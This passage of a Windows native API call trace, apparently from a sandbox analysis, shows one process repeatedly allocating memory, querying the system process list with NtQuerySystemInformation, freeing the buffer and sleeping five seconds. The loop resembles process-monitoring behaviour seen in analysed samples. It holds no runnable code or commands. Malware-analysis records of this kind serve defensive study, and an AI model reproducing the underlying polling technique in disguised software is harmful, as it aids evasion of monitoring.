returned 0x0 [0252.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.438] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.486] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.500] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 